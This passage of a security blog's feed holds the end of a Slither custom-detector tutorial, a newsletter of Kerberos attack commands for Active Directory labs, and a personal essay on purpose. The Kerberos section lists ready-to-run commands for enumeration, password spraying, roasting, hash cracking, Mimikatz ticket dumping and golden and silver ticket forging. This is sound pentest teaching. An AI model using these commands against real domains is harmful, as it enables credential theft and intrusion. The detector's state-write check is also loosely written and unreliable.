-   It searches for **low-level calls**, using Slither’s intermediate representation (`LowLevelCall`).
-   Then it checks whether there are **state changes that only occur if the call succeeds**, which is a red flag.
-   If that conditional logic is found, the detector raises a finding with the relevant details.

To build this, we rely more heavily on Slither’s IR and control flow structures, especially the `nodes` inside each function and the IR instructions (`irs`) they contain. But the logic still follows the same pattern you’ve seen before: loop through contracts and functions, analyze what’s happening, and collect the results.

Let’s look at the code.

```solidity
from typing import List

from slither.detectors.abstract_detector import AbstractDetector, DetectorClassification
from slither.utils.output import Output
from slither.core.declarations import Function
from slither.slithir.operations.low_level_call import LowLevelCall
from typing import List
from slither.utils.output import Output


class GasGriefingDetector(AbstractDetector):
    ARGUMENT = &quot;gas-griefing&quot;
    HELP = &quot;Detect gas griefing vulnerabilities due to conditional state logic after low-level calls&quot;
    IMPACT = DetectorClassification.MEDIUM
    CONFIDENCE = DetectorClassification.MEDIUM

    WIKI = &quot;https://example.com/wiki/gas-griefing&quot;
    WIKI_TITLE = &quot;Gas Griefing&quot;
    WIKI_DESCRIPTION = (
        &quot;Detects functions that modify state after a low-level call only if the call succeeded, &quot;
        &quot;which could allow griefing attacks if the external call consistently fails.&quot;
    )
    WIKI_EXPLOIT_SCENARIO = (
        &quot;An attacker interacts with a function that increases a counter before calling an external oracle. &quot;
        &quot;If the call fails, the counter is never decremented, eventually corrupting state.&quot;
    )
    WIKI_RECOMMENDATION = (
        &quot;Ensure external calls do not conditionally affect state in a way that could be abused &quot;
        &quot;by repeated failure or reverting of the external call.&quot;
    )


    def _detect(self) -&gt; List[Output]:
        results = []

        for contract in self.contracts:
            for function in contract.functions_and_modifiers_declared:

                if function.is_implemented and function.visibility in {&quot;public&quot;, &quot;external&quot;}:

                    low_level_calls = self._find_low_level_calls(function)
                    if low_level_calls and self._has_conditional_state_write(function):
                        info = [
                            f&quot;Function &apos;{function.full_name}&apos; in contract &apos;{contract.name}&apos; may be vulnerable to gas griefing.\n&quot;,
                            &quot;Detected low-level call(s) followed by conditional state modification.\n&quot;
                        ]

                        for call in low_level_calls:
                            src_map = call.node.source_mapping

                            if src_map and src_map.lines:
                                filename = src_map.filename.short
                                line_number = src_map.lines[0]
                                code_snippet = function.nodes[0].source_mapping.content
                                info.append(f&quot;  ↪ Low-level call at {filename}:{line_number}\n&quot;)
                            else:
                                info.append(&quot;  ↪ Low-level call at unknown location&quot;)

                        # Resultado para Slither
                        res = self.generate_result(info)
                        res.add(function)
                        for call in low_level_calls:
                            if code_snippet:
                                res.add(call.node, {&quot;type&quot;: &quot;low_level_call&quot;, &quot;code&quot;: f&quot;function {function.name}({&quot; &quot;.join(function.parameters)}) {function.visibility}\n{code_snippet.strip()}\n&quot;})
                        results.append(res)
        return results

    def _find_low_level_calls(self, function: Function) -&gt; List[LowLevelCall]:
        calls = []
        for node in function.nodes:
            for ir in node.irs:
                if isinstance(ir, LowLevelCall):
                    calls.append(ir)
        return calls

    def _has_conditional_state_write(self, function: Function) -&gt; bool:
        &quot;&quot;&quot;
        Checks if any node inside a conditional block modifies state
        &quot;&quot;&quot;
        for node in function.nodes:
            if node.son_true or node.son_false:  # Is inside an if/else
                for ir in node.irs:
                    return True
        return False



```

After creating the detector, we first need to **load** it into Slither, and then we can use a simple script to **run the detectors** and **print a clean table** with the results using **Rich**.

```python
def run_custom_detectors(slither, min_impact=None, min_confidence=None):
    from rich.console import Console
    from rich.table import Table
    from rich.panel import Panel

    console = Console()

    results = slither.run_detectors()

    # Set priority levels
    levels = {&quot;low&quot;: 1, &quot;medium&quot;: 2, &quot;high&quot;: 3}
    impact_threshold = levels.get(min_impact, 0)
    confidence_threshold = levels.get(min_confidence, 0)

    def is_valid(issue):
        impact = levels.get(issue.get(&quot;impact&quot;, &quot;&quot;).lower(), 0)
        confidence = levels.get(issue.get(&quot;confidence&quot;, &quot;&quot;).lower(), 0)
        return impact &gt;= impact_threshold and confidence &gt;= confidence_threshold

    filtered_results = [
        [issue for issue in group if is_valid(issue)] for group in results
    ]
    filtered_results = [group for group in filtered_results if group]

    if filtered_results:
        table = Table(title=&quot;Custom Detector Results&quot;, show_lines=True)
        table.add_column(&quot;Check&quot;, style=&quot;bold magenta&quot;)
        table.add_column(&quot;Impact&quot;, style=&quot;bold yellow&quot;)
        table.add_column(&quot;Confidence&quot;, style=&quot;green&quot;)
        table.add_column(&quot;Description&quot;, style=&quot;&quot;)

        for group in filtered_results:
            for issue in group:
                table.add_row(
                    issue.get(&quot;check&quot;, &quot;N/A&quot;),
                    issue.get(&quot;impact&quot;, &quot;N/A&quot;),
                    issue.get(&quot;confidence&quot;, &quot;N/A&quot;),
                    issue.get(&quot;description&quot;, &quot;No description&quot;),
                )
        console.print(table)
    else:
        console.print(Panel(&quot;[bold green]✅ No issues found by custom detectors!&quot;, title=&quot;All Clear&quot;))

```

Then, you can run the following functions to display the findings nicely:

```python
from slither.slither import Slither
from detectors.custom_detector import GasGriefingDetector

slither = Slither(&apos;.&apos;)
slither.register_detector(GasGriefingDetector)
run_custom_detectors(slither)

```

![](/content/images/2025/04/image-14.png)

Custom detector output

If we want an even better report, we can use **Rich’s syntax highlighting** to display the actual Solidity code of the vulnerable function directly in the terminal.

This works especially well if your **custom detector includes additional fields** in its results. For example, a snippet of the code where the issue occurs.  
When calling `generate_result(...)`, you can attach custom data (like the Solidity source) using the `additional_fields` argument. This way, your reporting function can extract that information and render it beautifully with Rich.

Here’s the improved version of the reporting function that takes advantage of this feature:

```python
def run_custom_detectors(slither, min_impact=None, min_confidence=None):
    from rich.panel import Panel
    from rich.syntax import Syntax
    from rich.rule import Rule
    console = Console()

    results = slither.run_detectors()

    # Filtros en orden de prioridad
    levels = {&quot;low&quot;: 1, &quot;medium&quot;: 2, &quot;high&quot;: 3}
    impact_threshold = levels.get(min_impact, 0)
    confidence_threshold = levels.get(min_confidence, 0)

    def is_valid(issue):
        impact = levels.get(issue.get(&quot;impact&quot;, &quot;&quot;).lower(), 0)
        confidence = levels.get(issue.get(&quot;confidence&quot;, &quot;&quot;).lower(), 0)
        return impact &gt;= impact_threshold and confidence &gt;= confidence_threshold

    filtered_results = [
        [issue for issue in group if is_valid(issue)] for group in results
    ]
    filtered_results = [group for group in filtered_results if group]

    if filtered_results:
        console.print(Rule(&quot;Custom Detector Report&quot;))

        for group in filtered_results:
            for issue in group:
                console.print(f&quot;[bold magenta]Check:[/] {issue.get(&apos;check&apos;, &apos;N/A&apos;)}&quot;)
                console.print(f&quot;[bold yellow]Impact:[/] {issue.get(&apos;impact&apos;, &apos;N/A&apos;)}&quot;)
                console.print(f&quot;[bold green]Confidence:[/] {issue.get(&apos;confidence&apos;, &apos;N/A&apos;)}&quot;)
                console.print(f&quot;[bold]Description:[/] {issue.get(&apos;description&apos;, &apos;No description&apos;)}&quot;)
                
                # Search for &apos;code&apos; in additional_fields
                elements = issue.get(&apos;elements&apos;, [])
                code_snippet = None
                for element in elements:
                    additional = element.get(&apos;additional_fields&apos;, {})
                    code_snippet = additional.get(&apos;code&apos;)
                    if code_snippet:
                        break
                if code_snippet:
                    console.print(&quot;\n[bold cyan]Code Snippet:[/]\n&quot;)
                    syntax = Syntax(code_snippet, &quot;solidity&quot;, line_numbers=True, theme=&quot;dracula&quot;)
                    console.print(syntax)
                
                console.print(Rule(style=&quot;dim&quot;))

    else:
        console.print(Panel(&quot;[bold green]✅ No issues found by custom detectors!&quot;, title=&quot;All Clear&quot;))

```

![](/content/images/2025/04/image-13.png)

Code Highlight

# Conclusions

In this chapter, we explored several ways to use Slither’s API, from **basic recon** to **building custom detectors**.  
We also learned how to **enhance Slither&apos;s output** using Python’s **Rich** library.

There&apos;s so much potential with Slither’s API. I encourage you to experiment and see what cool tools you can build!  
See you in the next chapter.

# References

Trail of Bits. &quot;Slither API Documentation: Python Interface for Static Analysis.&quot; Available at: [https://crytic.github.io/slither/](https://crytic.github.io/slither/slither.html)</content:encoded><author>Ruben Santos</author></item><item><title>Kerberos Tactics Every Pentester Should Know</title><link>https://www.kayssel.com/newsletter/issue-2</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-2</guid><description>A hands-on guide to the most effective Kerberos attacks in Active Directory environments</description><pubDate>Sun, 27 Apr 2025 08:43:14 GMT</pubDate><content:encoded>Hey everyone!  
Hope you&apos;re doing great.

Last week, I dropped some quick tips for hacking GraphQL APIs.  
This time, we’re jumping into Active Directory specifically, the must-know Kerberos attacks every pentester should have in their toolkit.

Also, quick note: I’m working on a deep dive into using Slither’s API for smart contract analysis. It’s taking a bit longer than expected, but it’ll be worth it!

Now, let&apos;s get into it:

# Kerberos Attacks Every Pentester Should Know

If you’re digging into Active Directory environments, understanding how to attack Kerberos is essential. At the end of the day, Kerberos is just the authentication protocol used by Active Directory and several of its steps can actually be exploited. If you want to dive deeper into how it all works, I’ve linked a more [detailed article here.](https://www.kayssel.com/post/kerberos/)

![](https://substackcdn.com/image/fetch/w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e760903-e24e-448d-9e8c-70621ddd88fd_996x678.png)

This post lays out the most important Kerberos attack techniques you need to have in your toolkit, along with commands you can try directly in your lab.

## Brute-Forcing and User Enumeration with Kerberos

One of the first things you want to do in a domain is find valid users. Kerberos helps with that, thanks to how it handles authentication errors.

Tools like `Kerbrute` make it easy to enumerate usernames without triggering account lockouts. You can also try password spraying or check if users are using their username as their password.

### Example usage:

```bash
kerbrute userenum --dc 10.10.10.10 -d domain.local usernames.txt
```

```bash
kerbrute passwordspray --dc 10.10.10.10 -d domain.local usernames.txt password123
```

[Kerbrute on GitHub](https://github.com/ropnop/kerbrute)

## AS-REP Roasting (ASREProast)

Some users are configured without pre-authentication. When that&apos;s the case, you can request authentication data encrypted with their NT hash and crack it offline.

### Example usage:

```bash
GetNPUsers.py domain.local/ -no-pass -usersfile users.txt -dc-ip 10.10.10.10
```

&lt;details&gt;
&lt;summary&gt;Then crack it:&lt;/summary&gt;

```bash
hashcat -m 18200 hashes.txt rockyou.txt
```
&lt;/details&gt;


## Kerberoasting

If you have valid domain creds, you can request service tickets for SPN accounts. These are encrypted with the account&apos;s NT hash. Once you extract the ticket, crack it to get the password.

### Example usage:

```bash
GetUserSPNs.py domain.local/username:password -dc-ip 10.10.10.10 -request
```

&lt;details&gt;
&lt;summary&gt;Crack the hash:&lt;/summary&gt;

```bash
hashcat -m 13100 hash.txt rockyou.txt
```
&lt;/details&gt;


## Over Pass-the-Hash (Pass-the-Key)

If you have the user&apos;s NT hash, you don’t need their password to authenticate and request a TGT. This lets you impersonate users and move laterally.

### Example usage:

```bash
getTGT.py -hashes :&lt;NT_HASH&gt; domain.local/username
export KRB5CCNAME=username.ccache
```

Use that ticket with any Kerberos-aware tool.

## Pass-the-Ticket

Dump valid Kerberos tickets from memory and reuse them across the network. You’ll need to convert formats and set the correct environment variable.

### Mimikatz:

```mimikatz
privilege::debug
sekurlsa::tickets /export
```

### Convert ticket:

```bash
ticketConverter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache
```

&lt;details&gt;
&lt;summary&gt;Then run:&lt;/summary&gt;

```bash
psexec.py domain.local/user@10.10.10.10
```
&lt;/details&gt;


## Golden Tickets

Golden Tickets let you generate valid TGTs for any user in the domain. All you need is the krbtgt account’s NT hash and the domain SID.

### Example usage:

```bash
ticketer.py -nthash &lt;krbtgt_hash&gt; -domain-sid S-1-5-21-XXXX -domain domain.local username
```

## Silver Tickets

Silver Tickets work like Golden Tickets but are scoped to specific services. You only need the hash of the service account, not krbtgt.

### Example usage:

```bash
ticketer.py -nthash &lt;svc_hash&gt; -domain domain.local -spn HTTP/web.domain.local -user user1
```

## Practice Environment

If you want to put these techniques into action, here are some recommended places to train:

### 🟢 **Beginner-Friendly**

-   [**Sauna**](https://www.hackthebox.com/machines/sauna)  
    A great starting point to get comfortable with Kerberos basics. You&apos;ll get to try user enumeration and explore ticket-based attacks.
-   [**Active**](https://www.hackthebox.com/machines/active)  
    Classic intro to AD misconfigurations. Expect to deal with password policy issues and simple Kerberos abuse techniques.
-   [**Forest**](https://www.hackthebox.com/machines/forest)  
    A must-try for anyone learning AD. You’ll get to play with Kerberoasting and domain privilege escalation paths.

* * *

### 🟡 **Intermediate**

-   [**Office**](https://www.hackthebox.com/machines/office)  
    Things start to heat up here. You’ll face challenges involving AS-REP Roasting and ticket handling under a realistic domain setup.
-   [**Escape**](https://www.hackthebox.com/machines/escape)  
    A nice mix of enumeration, ticket extraction, and lateral movement. You’ll need to connect the dots across several services.
-   [**Scrambled**](https://www.hackthebox.com/machines/scrambled)  
    Focuses more on authentication edge cases. You’ll explore service tickets and creative ways to escalate access.

* * *

### 🔴 **Advanced**

-   [**Absolute**](https://www.hackthebox.com/machines/absolute)  
    Not for the faint-hearted. Involves smart Kerberos abuse, privilege escalation, and post-exploitation tactics across multiple systems.
-   [**Flight**](https://www.hackthebox.com/machines/flight)  
    You’ll dive into TGT manipulation and tricky SPN-based attacks. A real test of your Kerberos fundamentals.
-   [**Sekhmet**](https://www.hackthebox.com/machines/sekhmet)  
    Expect deep AD integration, advanced ticket abuse, and clever paths that require lateral thinking and solid recon.
-   [**Hathor**](https://www.hackthebox.com/machines/hathor)  
    One of those boxes that really pushes your understanding of trust relationships and ticket management in Kerberos.
-   [**Anubis**](https://www.hackthebox.com/machines/anubis)  
    A deep dive into ticket reuse and delegation abuse. A great lab if you’re prepping for real-world red team ops.
-   [**Tentacle**](https://www.hackthebox.com/machines/tentacle)  
    Layers of service-based access with subtle Kerberos tricks along the way. You’ll need to think strategically to break through.
-   [**Mantis**](https://www.hackthebox.com/machines/mantis)  
    Complex and multi-layered. Kerberos plays a central role, but it’s mixed with heavy AD and infrastructure exploitation.

**Your own lab:** Set up a Windows Domain Controller, a few clients, and test safely with detection turned off. I’ve created a [series of posts](https://www.kayssel.com/series/offensive-lab/) talking about this topic.</content:encoded><category>Newsletter</category><category>active-directory</category><author>Ruben Santos</author></item><item><title>The Viking’s Question: What Are You Really Fighting For?</title><link>https://www.kayssel.com/post/mentaility-1</link><guid isPermaLink="true">https://www.kayssel.com/post/mentaility-1</guid><description>A purpose isn&apos;t something you wait for. it&apos;s something you build. Through discipline, reflection, and action, you can design a life worth living. In this article, we explore what it means to walk with purpose in a world full of noise and distraction.</description><pubDate>Sun, 20 Apr 2025 08:49:52 GMT</pubDate><content:encoded># Prologue - Why Am I doing this ?

He was born to fight.  
He learned how to wield a sword like no one else, how to row faster than the wind, and how to conquer cities like a true leader.  
He achieved glory like no Viking before him.  
He did all these things because that’s what Vikings were meant to do. It was the way of the Viking.

But one day, in the middle of battle, after having slain thousands, he realized that none of it made sense anymore.  
_Why am I doing all of this? I&apos;m feeling so empty all the time although I have everything, but why?_

Lost in that thought, he was defeated by his enemy and taken as a slave.  
During that time of suffering, witnessing the horrors of war up close, making his first real friends only to lose them again, he came to a different truth.

What he truly wanted wasn’t more battles.  
What he truly longed for was freedom. To escape war, to break the cycle.

With no more enemies left to fight, he chose to fight for something greater than himself:  
A real purpose. A place of peace. A land he would call **Free Land**.

At first, he believed that Free Land was a destination. But what he really found was something deeper. A new direction.  
He didn’t know if he would ever reach that land. And maybe it didn’t even matter.  
What mattered was that he had stopped living by others’ expectations, and started walking a path he truly believed in.

That was his new fight.  
And that’s the beginning of purpose.

# **What is purpose and why we need it**

Purpose sounds cool, doesn’t it? But what does it actually mean, and do we really need it?

Purpose isn’t some mystical or abstract idea. It’s simply having a direction in life, something worth fighting for, something that gives your actions meaning.

Most of us live on autopilot. We work, follow routines, and chase goals that society has told us are “good,” without ever stopping to ask why. Just like the Viking in our prologue, we often do things simply because that’s what’s expected of us. He fought because that’s what Vikings were supposed to do. That’s what his world told him had value.

Have you ever stopped to ask yourself why you&apos;re doing the things you do each day?

Waking up tired, working without meaning, scrolling endlessly, and wondering at night, “Is this it?”

But after pain, loss, and reflection, the Viking realized what he truly wanted wasn’t war. It was peace. And that’s the turning point many of us face. We wake up one day and realize we’ve been living someone else’s version of a meaningful life.

We must take control. We must fight to define our own version of what matters. When you know what you stand for, it becomes harder to drift away from your path.

Viktor Frankl, a psychiatrist and Holocaust survivor, wrote about this in his book [_Man’s Search for Meaning_](https://www.amazon.es/Mans-Search-Meaning-classic-Holocaust/dp/1846041244). He argued that our deepest drive as human beings isn’t pleasure, as [Freud claimed](https://www.wikiwand.com/en/articles/Pleasure_principle_\(psychology\)), but meaning. This idea became the foundation of what he called [logotherapy](https://www.wikiwand.com/en/articles/Logotherapy), from the Greek word _logos_, meaning “meaning” or “purpose”.

Frankl believed that if a person has a clear “why”, they can endure almost any “how”. And I couldn’t agree more.

Today, many people feel lost. They’re successful on paper but empty inside. They don’t know why they’re doing what they’re doing. They’re suffering from a quiet identity crisis. I know, because I’ve been there, and honestly, I still go through it sometimes.

Most of my friends today are chasing money or fame, thinking that it’s the only way to be “happy” and “free”. And honestly, that’s what most people seem to be looking for. I’ve thought a lot about this, and because of [hedonic adaptation](https://www.wikiwand.com/en/articles/Hedonic_treadmill), the way we quickly get used to what we achieve, even if they do make it, they’ll probably feel happy and free for a few years… and then the emptiness will return.

So, what’s the solution? I believe it’s to find a true purpose, something bigger than ourselves, something to fight for throughout our lives. And that’s not something we stumble upon by chance or inertia. It’s something we build, intentionally, from the beginning.

If you’ve ever felt like that, lost, unmotivated, like something’s missing, you’re not alone. That’s exactly why I started digging into this.

That’s why I wrote this. I’ve been researching this topic for a while, and I want to share some of the ideas, tools, and perspectives that have helped me. I hope they help you too.

# Create purpose vs wait to discover it

Let’s demystify the idea of “waiting for your purpose to appear.”  
Purpose isn’t something you find by thinking. It’s something you build by doing.  
Sometimes, mastering something over time can create the passion and clarity you were missing.

So, we know that we need a purpose in life.  
But maybe you&apos;re thinking: &quot;Ruben, I’ve been waiting for it since I was a kid, and I still don’t know what to do.&quot;  
You’ve probably tried different activities, hoping to find something that makes you feel good, something you enjoy and feel naturally good at.  
But now you&apos;re 30, and you’re still unsure.

Do these thoughts sound familiar?

In my case, I’ve often felt like I wasn’t good at anything.  
As a kid, I wasn’t particularly good at sports or school, or anything specific at all.  
Sure, I liked video games, fantasy books, anime, and series, but those are entertainment.  
They’re designed to be liked by everyone. So, I felt lost.  
People kept saying things like: &quot;Keep searching, Ruben, you’ll find it.&quot;  
And in many books, that’s also the advice: &quot;Find your passion, and you’ll succeed.&quot;  
But I’ve never found that perfect thing everyone talks about.

Maybe I’m still young, but that has been my experience for years.

So what can we do instead, if you, the reader, are in the same position?

We can create something that’s actually under our control.

A powerful Stoic tool called the **dichotomy of control** has helped me a lot.  
The idea is simple: focus on what you can control, and let go of what you can&apos;t.  
And your purpose is one of those things you can control.  
You can choose what you want to stand for, what you want to fight for.  
You can become the architect of your own life.

Now, maybe you’re thinking: &quot;Alright Ruben, sounds good… but what if I design a purpose, and later I realize I don’t like it?&quot;

That’s okay. Your first purpose isn’t your final purpose.  
It’s a starting point. A direction. Something you can adjust as you go.  
The important thing is: you’re taking action.

Most people wait until they feel ready or discover the right thing.  
But purpose rarely works that way.  
As Stanford psychologist William Damon explains, purpose isn’t something we passively discover, but something that grows through engagement and reflection.

In the same line, author and professor Cal Newport argues that passion often follows mastery, not the other way around.  
You don’t need to love something before you begin. Commitment and effort are what create the love over time.

And as philosopher Jean-Paul Sartre famously said, &quot;Man is nothing else but what he makes of himself.&quot;  
You’re not born with a purpose. You have to choose it, and then fight for it.

Let’s say you want to become the best developer in the world, but at first, you’re bad at solving problems, and you feel like you don’t even like it.  
Still, you fight for it because you chose it. You decided that’s the life you want.

What you need is to strengthen your discipline muscle and fight every single day.  
I promise you, after 10 years of showing up and improving, you’ll be amazing at solving problems.  
And people will say: &quot;Of course it’s easy for you, you’re so talented...&quot;  
But what they won’t see is the discipline, the effort, and the purpose that you built from scratch.

# The trap of false freedom without direction

In the first section of this article, I mentioned how many people see becoming rich as the ultimate goal, not just for the money itself, but for the freedom they believe it brings.  
But here&apos;s the danger: that kind of _“freedom”_ can easily turn into a trap. You end up becoming a slave to your own mind. Let me explain.

Imagine you could do whatever you wanted. You could buy a new car every week, a house every month, or date anyone you want. You&apos;re rich, so you’re _&quot;free&quot;_, right?

But without a clear direction, that freedom becomes meaningless.

And this is the trap:  
**Lack of commitment is not the same as freedom.**

Freedom without purpose is just drifting. Sooner or later, it leads to:

-   Feeling like you&apos;re not moving forward
-   A lack of personal growth
-   Emptiness or constant anxiety
-   Jumping from one thing to another without meaning (jobs, relationships, hobbies)

The only real freedom is the one that comes from within.  
It’s the freedom to choose your path and stay on it.  
That’s why you need a purpose. A direction. A reason behind your decisions.

Philosopher **Jean-Paul Sartre** said it clearly:

&gt; _&quot;Man is condemned to be free.&quot;_

This means we are always responsible for what we do with that freedom.  
If you don’t choose your own path, someone or something else will choose it for you: society, trends, fear, comfort.

**Viktor Frankl**, who survived the horrors of a concentration camp, wrote:

&gt; _&quot;When a person can&apos;t find a deep sense of meaning, they distract themselves with pleasure.&quot;_

And that’s what many people do today. We binge content, scroll endlessly, chase dopamine, but never stop to ask ourselves _why_.

Even earlier, **Søren Kierkegaard** warned about the _“dizziness of freedom”._ The anxiety that comes from having too many options without knowing which one to choose.  
Freedom, without commitment to something greater, becomes a source of existential paralysis.

**So what&apos;s the solution?**

The only way to feel truly free is to commit to a purpose that is meaningful to you.  
And to stay on that path, you don’t need motivation.  
You need **discipline,** the ability to act in line with your values even when it’s hard.

**That’s real freedom:** choosing what matters, and living by it.

# **Designing Your Purpose (Not Waiting for It)**

Now that we understand how important purpose is, the next step is simple in theory, but challenging in practice: we need to **create** it.

In my case, the first thing that helped me the most was **reflection**. Taking time to understand myself. Asking the right questions. Being brutally honest. Below is a list of powerful questions that I’ve answered over the years, and that helped me get some clarity.

They are adapted from the blog [_Fitness Revolucionario_](https://www.fitnessrevolucionario.com/2021/10/01/proposito-y-salud/), one of my favorite blogs of all time:

-   What things did you enjoy most as a child? What could you do for hours without getting tired?
-   What makes you feel truly happy? How could you help others feel the same?
-   What worries you about the world?
-   What problems do you think future generations will face?
-   What motivates you? What gives you energy?
-   What makes you angry? This may sound negative, but it often points to something you deeply care about.
-   What are you good at? What talents do you have?
-   What do people admire about you? If you don’t know, ask five friends.
-   What are you most proud of in your life?
-   What kind of books, blogs, or magazines do you read for pleasure? What sections do you go to first in a bookstore?
-   Who are your heroes? Who do you admire, and why?
-   Imagine you win 100 million euros. After paying your debts and traveling, how would your life change? What would you do then?
-   What ideas do you defend in discussions, even when most people disagree with you?
-   What do you love sharing with others?
-   How would you like your life to be in 5 or 10 years?
-   Imagine yourself at 90, on your last day. What would you regret? How would you like to be remembered?

Now, after going through these questions, you probably understand yourself a bit better. And here’s something cool: thanks to technology, you can feed your answers into tools like ChatGPT and ask for ideas, patterns, and feedback. This can be incredibly useful to reflect deeper and explore new possibilities. Ask anything. Even if you don’t find your purpose immediately, I’m sure you’ll discover something that resonates with you, a starting point. The first step toward your _ikigai_.

From here on, reflection should become a habit. One thing that helps me is keeping a **journal**. I use it to capture my thoughts, track changes, and make sense of what I’m feeling.  
Write about your _ikigai_, the direction it’s taking, and the decisions you’re making to move toward it.

This idea of **designing your life**, instead of waiting passively, is powerful.  
And you can apply it to more than just your purpose: to health, mindset, relationships, creativity, anything.

One concept I really love is **eudaimonia**. It comes from Ancient Greek philosophy and was central to thinkers like Aristotle and the Stoics. It’s often translated as _flourishing_ or _living well;_ becoming your best self. Not by comparing yourself to others, but by living in alignment with your values. By **earning your own applause**.

You are the director of your own life. So be intentional. Be creative.  
And fight for the future you want to build.

# **The Purpose as a way, not as a trophy**

One of the most important things to understand is that your purpose is not a destination. You might reach it, or you might not, and that’s okay. What truly matters is trying to live according to what you’ve designed for yourself. That is where real freedom begins. Instead of chasing a result, focus on the process of becoming. Focus on who you are while pursuing something that matters. Living with purpose is about direction, not perfection.

This mindset removes pressure. You don’t need to arrive anywhere specific. You just have to walk the path and stay on it. To make this sustainable, it’s essential to enjoy the journey, to fall in love with the process of growth. Psychologist Mihaly Csikszentmihalyi called this state &quot;flow&quot;, a mental space where you are fully immersed, focused, and energized by what you’re doing. Flow appears when challenge meets skill, when progress becomes deeply satisfying.

To enter this state more often, your systems matter. Your habits shape your identity. James Clear explains this beautifully in _Atomic Habits_, one of the most useful books I’ve read. His core idea is simple: small consistent actions create massive long-term impact. So if you want to grow, design your day around habits that reflect your values and your vision. For example, maybe you commit to one hour of cybersecurity, one hour of sport, and one hour of mindset work every day. These three hours, done consistently, will transform your life over time. Even if you have to work, clean, shop or take care of responsibilities, these core habits act as anchors. You don’t need perfection, just consistency.

That said, discipline doesn’t mean punishment. It’s also important to give yourself moments of rest and joy. After finishing your focused blocks, reward yourself with something that makes you feel good. Read, play games, watch an episode of a show you love. And even during the work itself, find ways to make it pleasant, maybe study while listening to music, or sip your favorite coffee while journaling. Some days won’t feel amazing. But you still show up. Because over time, even if you didn’t love the work at first, you’ll come to enjoy it. That’s what mastery does. It creates joy.

Modern Stoic thinkers like Marcos Vázquez emphasize this too. Living with intention doesn’t mean suffering nonstop. It means aligning your effort with something meaningful, building strength and enjoying the process of becoming stronger. In Buddhist philosophy, there’s a similar idea: act with presence, give your best, but let go of attachment to the outcome. When you stop obsessing over the final result, you can start enjoying the act itself. That’s when things shift.

Purpose is not something you win. It’s something you walk. And the longer you stay on the path, the more you begin to love the rhythm, not just the destination.

# **IA Era, Human Purpose and Evolution**

Before closing this article, I want to reflect on something that has been on my mind a lot lately: the rise of AI and how it affects our sense of purpose.

Many people are asking themselves things like, _“Why should I start learning this if AI will soon do it better than me?”_ And to be honest, I’ve asked myself the same question.

For example, I’ve spent countless hours learning how to automate tasks using Python or Bash. Years ago, this was an incredibly valuable skill. It helped me pass certifications like the OSCP and made me efficient in my work. Today, it’s still useful, but the truth is that AI can already generate similar scripts much faster than I can. And in the near future, it might even do it better.

So what does that mean? Should I give up? Should I feel useless?

Not at all.

Because there will always be things we cannot control. Maybe AI will eventually perform penetration tests on its own. Or maybe it will simply remain a powerful tool that helps us work better. We don’t know for sure.

What I’ve realized is this: our purpose is not something fixed. It’s a direction we follow during a certain phase of our life. And just like we evolve, our purpose can evolve too.

If one of your goals suddenly becomes obsolete or less meaningful, you can reshape it. You can adapt. You can choose a new purpose, a new version of yourself, a new challenge. You’re not locked in.

Purpose isn’t a static label. It’s a living intention that adjusts with time, with experience, and with context.

Today it’s AI. In the past, it was the industrial revolution. Every major shift in history has forced us to rethink who we are and what we want to do. But we humans have always found new paths to walk, new ways to grow, new dreams to pursue.

And that’s what makes purpose so powerful. It’s not about having one perfect mission forever.  
It’s about being intentional, again and again, no matter what changes around you.

You are the one who chooses how to respond. You are still the architect of your life.

# Conclusions

With this article, I’ve written something a bit different from what I usually share.  
But I truly believe that having the right mindset is essential. Not just in cybersecurity, but in life. That’s why I decided to publish this.

If you’ve made it this far, I really hope you found something useful, some idea that made you reflect or gave you clarity.

Now you understand why having a purpose, or at least a direction, matters so much.  
Purpose isn’t a gift you receive. It’s a path you decide to walk.  
You don’t need to have everything figured out from the beginning. You just need to take the first step and keep walking.

Your purpose doesn’t have to be perfect. It can evolve. It can adapt.  
What truly matters is living with intention and choosing to grow, even when things around you change.

Just like the Viking at the beginning of this story, you don’t need to fight for what others expect from you.  
You can stop following a script written by someone else.  
You can choose your own reason to fight; your own Free Land.

If you were waiting for a sign, this is it.  
Start building your path.  
Start designing your life.  
And above all, keep walking with purpose.

Because in the end, it’s not just about where you go.  
It’s about leaving a path that others might want to follow.

As Marcus Aurelius once wrote:  
**&quot;Don’t waste what remains of your life in speculating about others… Instead, be intentional in everything you do.&quot;**

Live with purpose. Build something worth remembering.  
And make it yours.

# References

Vázquez, M. _Fitness Revolucionario (Blog)._  
Available at: [https://www.fitnessrevolucionario.com](https://www.fitnessrevolucionario.com/)

Vázquez, M. _Invincible: Achieve More, Suffer Less._ Planeta Publishing, 2020.  
Available at: [https://www.fitnessrevolucionario.com/invicto/](http://fitnessrevolucionario.com/programas/invicto/)

Frankl, V. E. _Man’s Search for Meaning._ Beacon Press, 2006.  
Available at: [https://www.goodreads.com/book/show/4069.Man\_s\_Search\_for\_Meaning](https://www.goodreads.com/book/show/4069.Man_s_Search_for_Meaning)

Sartre, J.-P. _Existentialism Is a Humanism._ Yale University Press, 2007.  
Available at: [https://yalebooks.yale.edu/book/9780300115468/existentialism-is-a-humanism/](https://yalebooks.yale.edu/book/9780300115468/existentialism-is-a-humanism/)

Kierkegaard, S. _The Concept of Anxiety._ Princeton University Press, 1980.  
Available at: [https://press.princeton.edu/books/paperback/9780691020114/the-concept-of-anxiety](https://www.amazon.com/Concept-Anxiety-Psychologically-Deliberation-Kierkegaards/dp/0691020116)

Csikszentmihalyi, M. _Flow: The Psychology of Optimal Experience._ Harper Perennial, 2008.  
Available at: [https://www.goodreads.com/book/show/66354.Flow](https://www.goodreads.com/book/show/66354.Flow)

Clear, J. _Atomic Habits: An Easy &amp; Proven Way to Build Good Habits &amp; Break Bad Ones._ Avery, 2018.  
Available at: [https://jamesclear.com/atomic-habits](https://jamesclear.com/atomic-habits)

Damon, W. _The Path to Purpose: Helping Our Children Find Their Calling in Life._ Free Press, 2008.  
Available at: [https://www.goodreads.com/book/show/1393795.The\_Path\_to\_Purpose](https://www.goodreads.com/book/show/1393795.The_Path_to_Purpose)

Newport, C. _So Good They Can’t Ignore You: Why Skills Trump Passion in the Quest for Work You Love._ Grand Central Publishing, 2012.  
Available at: [https://www.calnewport.com/books/so-good/](https://calnewport.com/writing/#books)

Aurelius, M. _Meditations._ Translated by Gregory Hays, Modern Library, 2003.  
